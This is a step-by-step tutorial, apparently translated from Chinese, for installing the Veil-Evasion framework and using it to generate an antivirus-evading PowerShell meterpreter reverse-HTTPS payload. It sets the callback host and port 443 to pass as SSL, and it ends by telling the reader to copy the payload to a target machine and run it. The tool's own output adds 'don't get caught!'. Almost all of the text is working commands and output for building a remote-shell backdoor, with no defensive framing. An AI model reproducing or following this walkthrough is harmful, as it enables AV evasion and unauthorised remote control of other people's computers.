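Veil is a payload generator that bypasses antivirus software. Today I will show how to install it. There are several installation methods:
1. Install from source via Git. Create a directory and download the source code from Git. When the download finishes, change to the setup directory and run the bash script to install. Accept the defaults throughout.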

    sudo apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion/
    bash setup/setup.sh -s

2. Install via apt-get install

    root@kali:/# apt-get install veil
    正在读取软件包列表… 完成
    正在分析软件包的依赖关系树
    正在读取状态信息… 完成
    下列软件包是自动安装的并且现在不需要了:
    python-bitarray python-bloomfilter
    Use ‘apt-get autoremove’ to remove them.
    将会安装下列额外的软件包:
    veil-evasion
    下列【新】软件包将被安装:
    veil veil-evasion
    升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 43 个软件包未被升级。
    需要下载 5,367 kB 的软件包。
    解压缩后会消耗掉 16.5 MB 的额外空间。
    您希望继续执行吗?[Y/n]y
    获取:1 http://mirrors.ustc.edu.cn/kali/ kali/main veil-evasion amd64 2.20-0kali1 [5,360 kB]
    获取:2 http://mirrors.ustc.edu.cn/kali/ kali/main veil amd64 2.20-0kali1 [6,570 B]
    下载 5,367 kB,耗时 6秒 (782 kB/s)
    Selecting previously unselected package veil-evasion.
    (正在读取数据库 … 系统当前共安装有 340231 个文件和目录。)
    正在解压缩 veil-evasion (从 …/veil-evasion_2.20-0kali1_amd64.deb) …
    Selecting previously unselected package veil.
    正在解压缩 veil (从 …/veil_2.20-0kali1_amd64.deb) …
    正在设置 veil-evasion (2.20-0kali1) …
    正在设置 veil (2.20-0kali1) …

3. Launch and basic usage. Change to the installation directory, or type veil in any terminal, to run it.
List all modules:

    [menu>>]: lists
    =========================================================================
     Veil-Evasion | [Version]: 2.22.1
    =========================================================================
     [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    =========================================================================

     [*] Available Payloads:

        1)  auxiliary/coldwar_wrapper
        2)  auxiliary/pyinstaller_wrapper
        3)  c/meterpreter/rev_http
        4)  c/meterpreter/rev_http_service
        5)  c/meterpreter/rev_tcp
        6)  c/meterpreter/rev_tcp_service
        7)  c/shellcode_inject/flatc
        8)  cs/meterpreter/rev_http
        9)  cs/meterpreter/rev_https
        10) cs/meterpreter/rev_tcp
        11) cs/shellcode_inject/base64_substitution
        12) cs/shellcode_inject/virtual
        13) go/meterpreter/rev_http
        14) go/meterpreter/rev_https
        15) go/meterpreter/rev_tcp
        16) go/shellcode_inject/virtual
        17) native/backdoor_factory
        18) native/hyperion
        19) native/pe_scrambler
        20) powershell/meterpreter/rev_http
        21) powershell/meterpreter/rev_https
        22) powershell/meterpreter/rev_tcp
        23) powershell/shellcode_inject/download_virtual
        24) powershell/shellcode_inject/psexec_virtual
        25) powershell/shellcode_inject/virtual
        26) python/meterpreter/bind_tcp
        27) python/meterpreter/rev_http
        28) python/meterpreter/rev_http_contained
        29) python/meterpreter/rev_https
        30) python/meterpreter/rev_https_contained
        31) python/meterpreter/rev_tcp
        32) python/shellcode_inject/aes_encrypt
        33) python/shellcode_inject/aes_encrypt_HTTPKEY_Request
        34) python/shellcode_inject/arc_encrypt
        35) python/shellcode_inject/base64_substitution
        36) python/shellcode_inject/des_encrypt
        37) python/shellcode_inject/download_inject
        38) python/shellcode_inject/flat
        39) python/shellcode_inject/letter_substitution
        40) python/shellcode_inject/pidinject
        41) ruby/meterpreter/rev_http
        42) ruby/meterpreter/rev_http_contained
        43) ruby/meterpreter/rev_https
        44) ruby/meterpreter/rev_https_contained
        45) ruby/meterpreter/rev_tcp
        46) ruby/shellcode_inject/base64
        47) ruby/shellcode_inject/flat

At the [menu>>]: prompt, enter a module's ID to select it:

    [menu>>]: 21
    =========================================================================
     Veil-Evasion | [Version]: 2.22.1
    =========================================================================
     [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    =========================================================================

     Payload: powershell/meterpreter/rev_https loaded

     Required Options:

     Name       Current Value   Description
     ----       -------------   -----------
     LHOST                      IP of the Metasploit handler
     LPORT      8443            Port of the Metasploit handler
     PROXY      N               Use system proxy settings

     Available Commands:

        set         Set a specific option value
        info        Show information about the payload
        options     Show payload's options
        generate    Generate payload
        back        Go to the main menu
        exit        exit Veil-Evasion

     [powershell/meterpreter/rev_https>>]:

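4. Generate the payload. We set the two options LHOST and LPORT. This example uses a Windows XP machine on the local LAN as the target, IP: 192.168.34.73, with local port 443 (disguised as SSL), so the settings are as follows: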

    [powershell/meterpreter/rev_https>>]: set LHOST 192.168.34.220
     [i] LHOST => 192.168.34.220
    [powershell/meterpreter/rev_https>>]: set LPORT 443
     [i] LPORT => 443
    [powershell/meterpreter/rev_https>>]: generate
    =========================================================================
     Veil-Evasion | [Version]: 2.22.1
    =========================================================================
     [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    =========================================================================

     [>] Please enter the base name for output files (default is 'payload'): kali-key

     Language:          powershell
     Payload:           powershell/meterpreter/rev_https
     Required Options:  LHOST=192.168.34.220 LPORT=443 PROXY=N
     Payload File:      /usr/share/veil-output/source/kali-key.bat
     Handler File:      /usr/share/veil-output/handlers/kali-key_handler.rc

     [*] Your payload files have been generated, don't get caught!
     [!] And don't submit samples to any online scanner! ;)

     [>] Press any key to return to the main menu.

    =========================================================================
     Veil-Evasion | [Version]: 2.22.1
    =========================================================================
     [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    =========================================================================

     Main Menu

        47 payloads loaded

     Available Commands:

        use         Use a specific payload
        info        Information on a specific payload
        list        List available payloads
        update      Update Veil-Evasion to the latest version
        clean       Clean out payload folders
        checkvt     Check payload hashes vs. VirusTotal
        exit        Exit Veil-Evasion

     [menu>>]:

Copy the generated payload to the target host and run it there.